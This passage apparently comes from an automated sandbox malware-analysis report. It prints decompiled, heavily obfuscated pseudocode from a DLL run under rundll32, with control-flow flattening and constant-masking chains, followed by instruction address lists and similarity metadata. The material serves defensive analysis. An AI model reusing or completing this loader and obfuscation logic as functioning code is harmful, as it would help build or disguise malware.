				_v1760 = _v1760 * 0x61;
				_v1760 = _v1760 << 5;
				_v1760 = _v1760 / _t520;
				_v1760 = _v1760 ^ 0x000da470;
				_v1588 = 0x721a;
				_t521 = 0x47;
				_v1588 = _v1588 / _t521;
				_v1588 = _v1588 ^ 0x0000070f;
				_v1752 = 0x8c93;
				_v1752 = _v1752 << 0xa;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 | 0xe01a6e70;
				_v1752 = _v1752 ^ 0xf27a671c;
				_v1644 = 0xefc8;
				_t522 = 0x6d;
				_v1644 = _v1644 / _t522;
				_v1644 = _v1644 ^ 0x739099de;
				_v1644 = _v1644 ^ 0x7390cdd9;
				_v1596 = 0x1ffd;
				_v1596 = _v1596 ^ 0x86e06afb;
				_v1596 = _v1596 ^ 0x86e015b5;
				_v1652 = 0xc429;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 ^ 0x00006789;
				_v1600 = 0x57b4;
				_t523 = 0x7f;
				_v1600 = _v1600 / _t523;
				_v1600 = _v1600 ^ 0x00007042;
				_v1744 = 0xf601;
				_t524 = 0x2d;
				_v1744 = _v1744 * 0x77;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 * 0x2c;
				_v1744 = _v1744 ^ 0x397d78f9;
				_v1592 = 0x85ab;
				_v1592 = _v1592 << 4;
				_v1592 = _v1592 ^ 0x00082bb5;
				_v1720 = 0xd613;
				_v1720 = _v1720 + 0x2992;
				_v1720 = _v1720 << 1;
				_v1720 = _v1720 | 0xcb6149df;
				_v1720 = _v1720 ^ 0xcb61901b;
				_v1676 = 0x443b;
				_v1676 = _v1676 ^ 0xd199ed1f;
				_v1676 = _v1676 >> 2;
				_v1676 = _v1676 ^ 0x34667475;
				_v1608 = 0x7ce3;
				_v1608 = _v1608 ^ 0x2b9fed51;
				_v1608 = _v1608 ^ 0x2b9fdb73;
				_v1728 = 0xb946;
				_v1728 = _v1728 * 0x68;
				_v1728 = _v1728 * 0x6e;
				_v1728 = _v1728 << 0xe;
				_v1728 = _v1728 ^ 0xda080bad;
				_v1712 = 0xe175;
				_v1712 = _v1712 / _t524;
				_t525 = 0x68;
				_v1712 = _v1712 * 0x62;
				_v1712 = _v1712 | 0xebea7309;
				_v1712 = _v1712 ^ 0xebebb48d;
				_v1736 = 0xa5be;
				_v1736 = _v1736 + 0xffff1e6a;
				_v1736 = _v1736 >> 8;
				_v1736 = _v1736 ^ 0xa9a874dc;
				_v1736 = _v1736 ^ 0xa957bb08;
				_v1704 = 0x444d;
				_t180 =  &_v1704; // 0x444d
				_v1704 =  *_t180 * 0x38;
				_v1704 = _v1704 | 0xc313ec5d;
				_v1704 = _v1704 + 0xffffc096;
				_v1704 = _v1704 ^ 0xc31fa060;
				_v1668 = 0x6d52;
				_t189 =  &_v1668; // 0x6d52
				_v1668 =  *_t189 * 0x65;
				_v1668 = _v1668 ^ 0xbf90cb27;
				_v1668 = _v1668 ^ 0xbfbbe0fd;
				_v1584 = 0x2582;
				_v1584 = _v1584 ^ 0xe6613b83;
				_v1584 = _v1584 ^ 0xe6615551;
				_v1764 = 0x94b;
				_v1764 = _v1764 + 0x67c4;
				_v1764 = _v1764 / _t525;
				_v1764 = _v1764 >> 3;
				_v1764 = _v1764 ^ 0x00001cca;
				_v1688 = 0x9e3b;
				_v1688 = _v1688 + 0x5941;
				_v1688 = _v1688 << 2;
				_v1688 = _v1688 ^ 0x0003cfbe;
				_v1748 = 0x3388;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 ^ 0x81f115bf;
				_v1748 = _v1748 + 0xffff7117;
				_v1748 = _v1748 ^ 0x81f0c6d8;
				_v1620 = 0xeec5;
				_v1620 = _v1620 ^ 0x04d4525c;
				_v1620 = _v1620 ^ 0x04d4ab65;
				_v1624 = 0xdb2c;
				_v1624 = _v1624 << 1;
				_v1624 = _v1624 ^ 0x0001fe72;
				_v1580 = 0xb060;
				_v1580 = _v1580 + 0xae2;
				_v1580 = _v1580 ^ 0x0000f768;
				_v1660 = 0x96fa;
				_v1660 = _v1660 << 5;
				_v1660 = _v1660 | 0x6168c04a;
				_v1660 = _v1660 ^ 0x617aedf0;
				_v1672 = 0x7987;
				_v1672 = _v1672 | 0xba6a9da0;
				_v1672 = _v1672 + 0x37d3;
				_v1672 = _v1672 ^ 0xba6b374e;
				_v1680 = 0x436a;
				_v1680 = _v1680 + 0xffff28b9;
				_v1680 = _v1680 ^ 0xc211608a;
				_v1680 = _v1680 ^ 0x3dee43d2;
				_v1740 = 0x7dd0;
				_v1740 = _v1740 ^ 0x30cdb3c0;
				_v1740 = _v1740 ^ 0xa86be54c;
				_v1740 = _v1740 + 0xffffb5e9;
				_v1740 = _v1740 ^ 0x98a5bc8c;
				_v1612 = 0x1a91;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x06a46876;
				_v1664 = 0x6ac2;
				_v1664 = _v1664 ^ 0xd8b61fc6;
				_v1664 = _v1664 ^ 0x1ea3be60;
				_v1664 = _v1664 ^ 0xc615e743;
				_v1732 = 0x55c4;
				_v1732 = _v1732 >> 0xf;
				_v1732 = _v1732 + 0xffffedaa;
				_t526 = 0xa;
				_v1732 = _v1732 * 0x58;
				_v1732 = _v1732 ^ 0xfff9af4a;
				_v1604 = 0x92de;
				_v1604 = _v1604 >> 8;
				_v1604 = _v1604 ^ 0x000052ef;
				_v1640 = 0x375a;
				_v1640 = _v1640 ^ 0x8d7c695b;
				_t527 = 0x12;
				_v1640 = _v1640 / _t526;
				_v1640 = _v1640 ^ 0x0e263cba;
				_v1708 = 0xa848;
				_v1708 = _v1708 << 2;
				_v1708 = _v1708 + 0xffff4f47;
				_v1708 = _v1708 >> 0x10;
				_v1708 = _v1708 ^ 0x00004df5;
				_v1716 = 0x3304;
				_v1716 = _v1716 ^ 0x61e3d3e4;
				_v1716 = _v1716 + 0x5bdd;
				_v1716 = _v1716 + 0xffffa59f;
				_v1716 = _v1716 ^ 0x61e3ceb5;
				_v1648 = 0x6dc4;
				_v1648 = _v1648 | 0x8611d38f;
				_v1648 = _v1648 << 8;
				_v1648 = _v1648 ^ 0x11ffcc6f;
				_v1656 = 0x328f;
				_v1656 = _v1656 * 0x7c;
				_v1656 = _v1656 + 0xeaba;
				_v1656 = _v1656 ^ 0x00191fbe;
				_v1632 = 0x61f7;
				_v1632 = _v1632 / _t527;
				_t528 = 0x58;
				_v1632 = _v1632 / _t528;
				_v1632 = _v1632 ^ 0x00002538;
				_v1692 = 0x1be6;
				_v1692 = _v1692 | 0x9feafdcd;
				_v1692 = _v1692 << 2;
				_v1692 = _v1692 | 0x8d482522;
				_v1692 = _v1692 ^ 0xffebf3eb;
				_v1700 = 0x9b1b;
				_t529 = 0x31;
				_t516 = _v1576;
				_v1700 = _v1700 / _t529;
				_v1700 = _v1700 * 0x73;
				_v1700 = _v1700 << 0xe;
				_v1700 = _v1700 ^ 0x5af7f17e;
				_v1724 = 0xca47;
				_v1724 = _v1724 << 0xd;
				_v1724 = _v1724 >> 5;
				_v1724 = _v1724 + 0xd0a1;
				_v1724 = _v1724 ^ 0x00cb17a0;
				while(1) {
					L1:
					_t530 = 0x5c;
					while(1) {
						L2:
						_t493 = 0x6df7a4c;
						do {
							L3:
							if(_t581 == _t493) {
								_t495 = E1001BBAB(_v1664, _v1732,  &_v1560, _v1604);
								_pop(_t533);
								_t497 = E1001EC06(_v1640,  &_v1560, _v1708, _t516, _v1572, _t533, _v1716, _v1648, 2 + _t495 * 2, _v1724, _v1656);
								_t586 =  &(_t586[9]);
								__eflags = _t497;
								_t581 = 0x2a46bc81;
								_t448 = _t497 == 0;
								__eflags = _t448;
								_v1576 = 0 | _t448;
								goto L17;
							} else {
								if(_t581 == 0xbbbecbf) {
									_t518 =  *0x100221b0 + 0x10;
									while(1) {
										__eflags =  *_t518 - _t530;
										if(__eflags == 0) {
											break;
										}
										_t518 = _t518 + 2;
										__eflags = _t518;
									}
									_t516 = _t518 + 2;
									_t581 = 0x2529a265;
									goto L2;
								} else {
									if(_t581 == 0x2529a265) {
										_push(0x10001080);
										_push(_v1764);
										_t499 = E1001BF25(_v1668, _v1584, __eflags);
										_pop(_t539);
										_t425 =  &_v1624; // 0xe6615551
										__eflags = E10013659(_v1688, _v1748, _v1620,  *_t425, _v1580, _t539,  &_v1572, _v1660, _t539, _t539, _t499, _t539, _v1756, _v1636);
										_t581 =  ==  ? 0x6df7a4c : 0x1cdd012f;
										E1001C5F7(_v1672, _v1680, _v1740, _v1612, _t499);
										_t586 =  &(_t586[0x10]);
										L17:
										_t493 = 0x6df7a4c;
										_t530 = 0x5c;
										goto L18;
									} else {
										if(_t581 == 0x2a46bc81) {
											E10015483(_v1632, _v1692, _v1700, _v1572);
										} else {
											if(_t581 == 0x2a61740b) {
												_push(0x10001020);
												_push(_v1596);
												_t505 = E1001BF25(_v1752, _v1644, __eflags);
												E100173C0( &_v1040, __eflags);
												E10003482(_v1600, __eflags,  &_v520,  &_v1560, _v1744, _v1592,  &_v1040,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t505, _v1720, _v1676, _v1608);
												E1001C5F7(_v1728, _v1712, _v1736, _v1704, _t505);
												_t586 =  &(_t586[0x11]);
												_t581 = 0xbbbecbf;
												goto L1;
											} else {
												if(_t581 != 0x3875c21b) {
													goto L18;
												} else {
													_push(_t530);
													E10001D54(_v1684, _t530, _v1628, _v1696, _v1760,  &_v520, _v1588, _v1616);
													_t586 =  &(_t586[8]);
													_t581 = 0x2a61740b;
													while(1) {
														L1:
														_t530 = 0x5c;
														L2:
														_t493 = 0x6df7a4c;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1576;
							L18:
							__eflags = _t581 - 0x1cdd012f;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}
















































































                                                                        0x1001f411
                                                                        0x1001f417
                                                                        0x1001f424
                                                                        0x1001f42d
                                                                        0x1001f438
                                                                        0x1001f440
                                                                        0x1001f44b
                                                                        0x1001f456
                                                                        0x1001f45e
                                                                        0x1001f469
                                                                        0x1001f474
                                                                        0x1001f47c
                                                                        0x1001f484
                                                                        0x1001f48d
                                                                        0x1001f494
                                                                        0x1001f49f
                                                                        0x1001f4a4
                                                                        0x1001f4aa
                                                                        0x1001f4b2
                                                                        0x1001f4bf
                                                                        0x1001f4c2
                                                                        0x1001f4cb
                                                                        0x1001f4cf
                                                                        0x1001f4d7
                                                                        0x1001f4ea
                                                                        0x1001f4f1
                                                                        0x1001f4fc
                                                                        0x1001f504
                                                                        0x1001f509
                                                                        0x1001f50e
                                                                        0x1001f512
                                                                        0x1001f51a
                                                                        0x1001f527
                                                                        0x1001f52b
                                                                        0x1001f538
                                                                        0x1001f53c
                                                                        0x1001f544
                                                                        0x1001f556
                                                                        0x1001f55b
                                                                        0x1001f564
                                                                        0x1001f56f
                                                                        0x1001f577
                                                                        0x1001f57c
                                                                        0x1001f581
                                                                        0x1001f589
                                                                        0x1001f591
                                                                        0x1001f5a3
                                                                        0x1001f5a6
                                                                        0x1001f5ad
                                                                        0x1001f5b8
                                                                        0x1001f5c3
                                                                        0x1001f5ce
                                                                        0x1001f5d9
                                                                        0x1001f5e4
                                                                        0x1001f5ef
                                                                        0x1001f5f7
                                                                        0x1001f5ff
                                                                        0x1001f60a
                                                                        0x1001f620
                                                                        0x1001f625
                                                                        0x1001f62e
                                                                        0x1001f639
                                                                        0x1001f646
                                                                        0x1001f649
                                                                        0x1001f652
                                                                        0x1001f65b
                                                                        0x1001f65f
                                                                        0x1001f667
                                                                        0x1001f672
                                                                        0x1001f67a
                                                                        0x1001f685
                                                                        0x1001f68d
                                                                        0x1001f695
                                                                        0x1001f699
                                                                        0x1001f6a1
                                                                        0x1001f6a9
                                                                        0x1001f6b1
                                                                        0x1001f6b9
                                                                        0x1001f6be
                                                                        0x1001f6c6
                                                                        0x1001f6d1
                                                                        0x1001f6dc
                                                                        0x1001f6e7
                                                                        0x1001f6f4
                                                                        0x1001f6fd
                                                                        0x1001f701
                                                                        0x1001f706
                                                                        0x1001f70e
                                                                        0x1001f71e
                                                                        0x1001f727
                                                                        0x1001f728
                                                                        0x1001f72c
                                                                        0x1001f734
                                                                        0x1001f73c
                                                                        0x1001f744
                                                                        0x1001f74c
                                                                        0x1001f751
                                                                        0x1001f759
                                                                        0x1001f761
                                                                        0x1001f769
                                                                        0x1001f76e
                                                                        0x1001f772
                                                                        0x1001f77a
                                                                        0x1001f782
                                                                        0x1001f78a
                                                                        0x1001f792
                                                                        0x1001f797
                                                                        0x1001f79b
                                                                        0x1001f7a3
                                                                        0x1001f7ab
                                                                        0x1001f7b6
                                                                        0x1001f7c1
                                                                        0x1001f7cc
                                                                        0x1001f7d4
                                                                        0x1001f7e2
                                                                        0x1001f7e6
                                                                        0x1001f7eb
                                                                        0x1001f7f3
                                                                        0x1001f7fb
                                                                        0x1001f803
                                                                        0x1001f808
                                                                        0x1001f812
                                                                        0x1001f81a
                                                                        0x1001f81f
                                                                        0x1001f827
                                                                        0x1001f82f
                                                                        0x1001f837
                                                                        0x1001f842
                                                                        0x1001f84d
                                                                        0x1001f858
                                                                        0x1001f863
                                                                        0x1001f86a
                                                                        0x1001f875
                                                                        0x1001f880
                                                                        0x1001f88b
                                                                        0x1001f896
                                                                        0x1001f89e
                                                                        0x1001f8a3
                                                                        0x1001f8ab
                                                                        0x1001f8b3
                                                                        0x1001f8bb
                                                                        0x1001f8c3
                                                                        0x1001f8cb
                                                                        0x1001f8d3
                                                                        0x1001f8db
                                                                        0x1001f8e3
                                                                        0x1001f8eb
                                                                        0x1001f8f3
                                                                        0x1001f8fb
                                                                        0x1001f903
                                                                        0x1001f90b
                                                                        0x1001f913
                                                                        0x1001f91b
                                                                        0x1001f926
                                                                        0x1001f92e
                                                                        0x1001f939
                                                                        0x1001f941
                                                                        0x1001f949
                                                                        0x1001f951
                                                                        0x1001f959
                                                                        0x1001f961
                                                                        0x1001f966
                                                                        0x1001f975
                                                                        0x1001f978
                                                                        0x1001f97c
                                                                        0x1001f984
                                                                        0x1001f98f
                                                                        0x1001f997
                                                                        0x1001f9a2
                                                                        0x1001f9ad
                                                                        0x1001f9c1
                                                                        0x1001f9c2
                                                                        0x1001f9c9
                                                                        0x1001f9d4
                                                                        0x1001f9dc
                                                                        0x1001f9e1
                                                                        0x1001f9e9
                                                                        0x1001f9ee
                                                                        0x1001f9f6
                                                                        0x1001f9fe
                                                                        0x1001fa06
                                                                        0x1001fa0e
                                                                        0x1001fa16
                                                                        0x1001fa1e
                                                                        0x1001fa29
                                                                        0x1001fa34
                                                                        0x1001fa3c
                                                                        0x1001fa47
                                                                        0x1001fa54
                                                                        0x1001fa58
                                                                        0x1001fa60
                                                                        0x1001fa6a
                                                                        0x1001fa80
                                                                        0x1001fa95
                                                                        0x1001fa9a
                                                                        0x1001faa3
                                                                        0x1001faae
                                                                        0x1001fab6
                                                                        0x1001fabe
                                                                        0x1001fac3
                                                                        0x1001facb
                                                                        0x1001fad3
                                                                        0x1001fadf
                                                                        0x1001fae2
                                                                        0x1001fae9
                                                                        0x1001faf2
                                                                        0x1001faf6
                                                                        0x1001fafb
                                                                        0x1001fb03
                                                                        0x1001fb0b
                                                                        0x1001fb10
                                                                        0x1001fb15
                                                                        0x1001fb1d
                                                                        0x1001fb25
                                                                        0x1001fb25
                                                                        0x1001fb27
                                                                        0x1001fb28
                                                                        0x1001fb28
                                                                        0x1001fb28
                                                                        0x1001fb2d
                                                                        0x1001fb2d
                                                                        0x1001fb2f
                                                                        0x1001fd1d
                                                                        0x1001fd23
                                                                        0x1001fd5a
                                                                        0x1001fd61
                                                                        0x1001fd64
                                                                        0x1001fd66
                                                                        0x1001fd6b
                                                                        0x1001fd6b
                                                                        0x1001fd6e
                                                                        0x00000000
                                                                        0x1001fb35
                                                                        0x1001fb3b
                                                                        0x1001fcef
                                                                        0x1001fcf7
                                                                        0x1001fcf7
                                                                        0x1001fcfa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001fcf4
                                                                        0x1001fcf4
                                                                        0x1001fcf4
                                                                        0x1001fcfc
                                                                        0x1001fcff
                                                                        0x00000000
                                                                        0x1001fb41
                                                                        0x1001fb43
                                                                        0x1001fc52
                                                                        0x1001fc57
                                                                        0x1001fc66
                                                                        0x1001fc6c
                                                                        0x1001fc95
                                                                        0x1001fcbb
                                                                        0x1001fcd9
                                                                        0x1001fcdc
                                                                        0x1001fce1
                                                                        0x1001fd75
                                                                        0x1001fd77
                                                                        0x1001fd7c
                                                                        0x00000000
                                                                        0x1001fb49
                                                                        0x1001fb4f
                                                                        0x1001fda1
                                                                        0x1001fb55
                                                                        0x1001fb5b
                                                                        0x1001fba3
                                                                        0x1001fba8
                                                                        0x1001fbba
                                                                        0x1001fbc8
                                                                        0x1001fc24
                                                                        0x1001fc40
                                                                        0x1001fc45
                                                                        0x1001fc48
                                                                        0x00000000
                                                                        0x1001fb5d
                                                                        0x1001fb63
                                                                        0x00000000
                                                                        0x1001fb69
                                                                        0x1001fb69
                                                                        0x1001fb94
                                                                        0x1001fb99
                                                                        0x1001fb9c
                                                                        0x1001fb25
                                                                        0x1001fb25
                                                                        0x1001fb27
                                                                        0x1001fb28
                                                                        0x1001fb28
                                                                        0x00000000
                                                                        0x1001fb28
                                                                        0x1001fb25
                                                                        0x1001fb63
                                                                        0x1001fb5b
                                                                        0x1001fb4f
                                                                        0x1001fb43
                                                                        0x1001fb3b
                                                                        0x1001fda8
                                                                        0x1001fdb9
                                                                        0x1001fd7d
                                                                        0x1001fd7d
                                                                        0x1001fd7d
                                                                        0x00000000
                                                                        0x1001fd89
                                                                        0x1001fb28

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: s$1{$8%$AY$Bp$K$MDu$QUa$Rmutf4$Z7$jC$n9$utf4$u$R$|
                                                                        • API String ID: 0-2491655032
                                                                        • Opcode ID: 4044c3afec894246fee1f662e1da1731f593b194fe46b34393316257da5b73b0
                                                                        • Instruction ID: bb0f35014981fe5b56090f270f76ab9b3438ccc7679621ff333ea9736163f667
                                                                        • Opcode Fuzzy Hash: 4044c3afec894246fee1f662e1da1731f593b194fe46b34393316257da5b73b0
                                                                        • Instruction Fuzzy Hash: 6B32D37150C3809FE369CF25C98AA9FBBE2FBC5354F10891DE19A862A0D7B59549CF03
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000F813, Relevance: 20.4, Strings: 16, Instructions: 429COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1000F813() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				unsigned int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				intOrPtr* _t473;
				void* _t479;
				intOrPtr* _t489;
				void* _t491;
				void* _t522;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				intOrPtr _t540;
				intOrPtr* _t542;
				intOrPtr* _t543;
				signed int* _t547;
				void* _t550;

				_t547 =  &_v1772;
				_v1564 = 0xa43e;
				_v1564 = _v1564 ^ 0x45b26b29;
				_t491 = 0x29fd4c8c;
				_v1564 = _v1564 ^ 0x45b2cf3e;
				_v1604 = 0xd832;
				_v1604 = _v1604 << 7;
				_v1604 = _v1604 ^ 0x006c754a;
				_v1676 = 0xea82;
				_v1676 = _v1676 | 0xeffbbfdd;
				_v1676 = _v1676 ^ 0xeffbe896;
				_v1744 = 0x2481;
				_v1744 = _v1744 << 6;
				_v1744 = _v1744 + 0x9ec7;
				_v1744 = _v1744 + 0x8a8;
				_v1744 = _v1744 ^ 0x0009f1d1;
				_v1580 = 0x9f5;
				_v1580 = _v1580 | 0x253f9e02;
				_v1580 = _v1580 ^ 0x253fa85d;
				_v1612 = 0xe62c;
				_v1612 = _v1612 ^ 0xf7e1e6dc;
				_v1612 = _v1612 ^ 0xf7e121db;
				_v1644 = 0xa597;
				_v1644 = _v1644 << 3;
				_v1644 = _v1644 ^ 0x00057224;
				_v1636 = 0x74cb;
				_v1636 = _v1636 | 0x8dfb5c1d;
				_v1636 = _v1636 ^ 0x8dfb1908;
				_v1672 = 0xf927;
				_t530 = 0x47;
				_v1672 = _v1672 / _t530;
				_v1672 = _v1672 << 8;
				_t543 = 0;
				_v1672 = _v1672 ^ 0x0003eef2;
				_v1684 = 0xe8df;
				_v1684 = _v1684 ^ 0xe48f8edf;
				_t531 = 0x4b;
				_v1576 = 0;
				_v1684 = _v1684 * 0xe;
				_v1684 = _v1684 ^ 0x7fd7efbf;
				_v1572 = 0xd38b;
				_v1572 = _v1572 | 0x212f5c39;
				_v1572 = _v1572 ^ 0x212fa689;
				_v1652 = 0x1200;
				_v1652 = _v1652 / _t531;
				_v1652 = _v1652 ^ 0x00000a2b;
				_v1596 = 0x13dd;
				_v1596 = _v1596 | 0xceb868f3;
				_v1596 = _v1596 ^ 0xceb84d66;
				_v1768 = 0x3bb1;
				_v1768 = _v1768 + 0xffff0d17;
				_v1768 = _v1768 >> 7;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x0007e300;
				_v1716 = 0xf0d2;
				_v1716 = _v1716 + 0xe075;
				_v1716 = _v1716 ^ 0x9b47385c;
				_v1716 = _v1716 ^ 0x9b46cdd4;
				_v1660 = 0x69dd;
				_v1660 = _v1660 | 0x8bdea621;
				_v1660 = _v1660 << 0x10;
				_v1660 = _v1660 ^ 0xeffd1439;
				_v1760 = 0x4063;
				_v1760 = _v1760 << 6;
				_v1760 = _v1760 * 0x7c;
				_v1760 = _v1760 ^ 0xd256c198;
				_v1760 = _v1760 ^ 0xd59d1bc0;
				_v1628 = 0x90dd;
				_v1628 = _v1628 + 0xffff497e;
				_v1628 = _v1628 ^ 0xffffd705;
				_v1736 = 0xfcae;
				_t532 = 0x46;
				_v1736 = _v1736 / _t532;
				_v1736 = _v1736 + 0xcadb;
				_v1736 = _v1736 ^ 0x517b85fd;
				_v1736 = _v1736 ^ 0x517b3d77;
				_v1708 = 0xaa4c;
				_t533 = 0xd;
				_v1708 = _v1708 * 0x56;
				_v1708 = _v1708 | 0x843164d5;
				_v1708 = _v1708 ^ 0x84391434;
				_v1688 = 0x7b92;
				_v1688 = _v1688 + 0x23d3;
				_v1688 = _v1688 | 0xa0cceb2c;
				_v1688 = _v1688 ^ 0xa0ccf5a5;
				_v1696 = 0x2f42;
				_v1696 = _v1696 + 0xffffada6;
				_v1696 = _v1696 + 0xffffd11c;
				_v1696 = _v1696 ^ 0xffff8010;
				_v1704 = 0x664;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 << 4;
				_v1704 = _v1704 ^ 0x001991ab;
				_v1600 = 0x17c3;
				_v1600 = _v1600 * 0x6e;
				_v1600 = _v1600 ^ 0x000a4796;
				_v1756 = 0x876e;
				_v1756 = _v1756 ^ 0xccadfb01;
				_v1756 = _v1756 / _t533;
				_v1756 = _v1756 | 0x71b05a4c;
				_v1756 = _v1756 ^ 0x7fbe83ae;
				_v1608 = 0xc50f;
				_t534 = 0x7e;
				_v1608 = _v1608 / _t534;
				_v1608 = _v1608 ^ 0x00000e7d;
				_v1712 = 0xe559;
				_v1712 = _v1712 | 0xff7f7fff;
				_v1712 = _v1712 ^ 0xff7fd517;
				_v1720 = 0x1170;
				_v1720 = _v1720 * 0x2e;
				_v1720 = _v1720 | 0xa70aa585;
				_v1720 = _v1720 ^ 0xa70bab82;
				_v1724 = 0x666c;
				_v1724 = _v1724 | 0x8fee4b7f;
				_v1724 = _v1724 ^ 0x8fee281e;
				_v1772 = 0xf606;
				_v1772 = _v1772 ^ 0x11a63a32;
				_v1772 = _v1772 >> 1;
				_v1772 = _v1772 | 0xbd41a285;
				_v1772 = _v1772 ^ 0xbdd3c841;
				_v1624 = 0xc87;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0x000cb845;
				_v1632 = 0xcf71;
				_v1632 = _v1632 + 0x859a;
				_v1632 = _v1632 ^ 0x000172a0;
				_v1640 = 0x9b4e;
				_v1640 = _v1640 + 0xfffffeb0;
				_v1640 = _v1640 ^ 0x0000b068;
				_v1752 = 0x51f0;
				_v1752 = _v1752 << 0xd;
				_v1752 = _v1752 * 9;
				_v1752 = _v1752 ^ 0xa73676e0;
				_v1752 = _v1752 ^ 0xfb182fbc;
				_v1568 = 0x8b8;
				_v1568 = _v1568 | 0x4447cdf9;
				_v1568 = _v1568 ^ 0x4447aa39;
				_v1732 = 0xaa2a;
				_t535 = 0x4c;
				_v1732 = _v1732 / _t535;
				_v1732 = _v1732 >> 7;
				_v1732 = _v1732 | 0x5d199c15;
				_v1732 = _v1732 ^ 0x5d19ea5e;
				_v1740 = 0x9be5;
				_v1740 = _v1740 ^ 0x27ebeb7e;
				_v1740 = _v1740 >> 6;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xfadc41bb;
				_v1748 = 0xab1f;
				_v1748 = _v1748 >> 0xd;
				_v1748 = _v1748 | 0x2e03c9c9;
				_t536 = 0x78;
				_v1748 = _v1748 * 0x61;
				_v1748 = _v1748 ^ 0x6f6f6458;
				_v1680 = 0x432d;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 + 0xaa9a;
				_v1680 = _v1680 ^ 0x008720ae;
				_v1620 = 0xb695;
				_v1620 = _v1620 | 0x9c0d8b30;
				_v1620 = _v1620 ^ 0x9c0dd91b;
				_v1700 = 0x7cda;
				_v1700 = _v1700 / _t536;
				_v1700 = _v1700 << 5;
				_v1700 = _v1700 ^ 0x00004203;
				_v1668 = 0xca1;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 + 0xfb4a;
				_v1668 = _v1668 ^ 0x00041992;
				_v1588 = 0x2832;
				_v1588 = _v1588 + 0xffff4b77;
				_v1588 = _v1588 ^ 0xffff7d0e;
				_v1584 = 0xd717;
				_v1584 = _v1584 + 0x8534;
				_v1584 = _v1584 ^ 0x00011bb2;
				_v1656 = 0x6f3e;
				_v1656 = _v1656 >> 0xc;
				_t537 = 0x2b;
				_v1656 = _v1656 / _t537;
				_v1656 = _v1656 ^ 0x00003e2a;
				_v1664 = 0x8f26;
				_v1664 = _v1664 >> 6;
				_v1664 = _v1664 << 2;
				_v1664 = _v1664 ^ 0x0000651c;
				_v1728 = 0xe7d3;
				_v1728 = _v1728 << 0xd;
				_t538 = 0x2a;
				_v1728 = _v1728 / _t538;
				_v1728 = _v1728 ^ 0x00b0dbe1;
				_v1592 = 0xd2ea;
				_t539 = 0x52;
				_v1592 = _v1592 / _t539;
				_v1592 = _v1592 ^ 0x000f02ad;
				_v1692 = 0x3985;
				_t546 = _v1576;
				_t490 = _v1576;
				_t540 = _v1576;
				_v1692 = _v1692 * 0x1b;
				_v1692 = _v1692 ^ 0x0e34e665;
				_v1692 = _v1692 ^ 0x0e32f760;
				_v1616 = 0x5c84;
				_v1616 = _v1616 >> 0xd;
				_v1764 = 0x6db6;
				_v1764 = _v1764 << 9;
				_v1764 = _v1764 + 0xffff9705;
				_v1764 = _v1764 | 0x2711d9d9;
				_v1764 = _v1764 ^ 0x27dbdbdd;
				_v1648 = 0x109c;
				_v1648 = _v1648 + 0x526d;
				_v1648 = _v1648 ^ 0x00006319;
				while(1) {
					L1:
					_t522 = 0x5c;
					do {
						while(1) {
							L2:
							_t550 = _t491 - 0x29fd4c8c;
							if(_t550 > 0) {
								break;
							}
							if(_t550 == 0) {
								_push(_t491);
								E10001D54(_v1604, _t491, _v1676, _v1744, _v1580,  &_v1040, _v1612, _v1564);
								_t547 =  &(_t547[8]);
								_t491 = 0x1e06f250;
								while(1) {
									L1:
									_t522 = 0x5c;
									goto L2;
								}
							} else {
								if(_t491 == 0x2d4cd3b) {
									_t542 =  *0x100221b0 + 0x10;
									while(1) {
										__eflags =  *_t542 - _t522;
										if(__eflags == 0) {
											break;
										}
										_t542 = _t542 + 2;
										__eflags = _t542;
									}
									_t540 = _t542 + 2;
									_t491 = 0x2f9aa500;
									continue;
								} else {
									if(_t491 == 0x10ed6b66) {
										E1001F23C(_v1584, _t490, _v1656, _v1664, _v1728);
									} else {
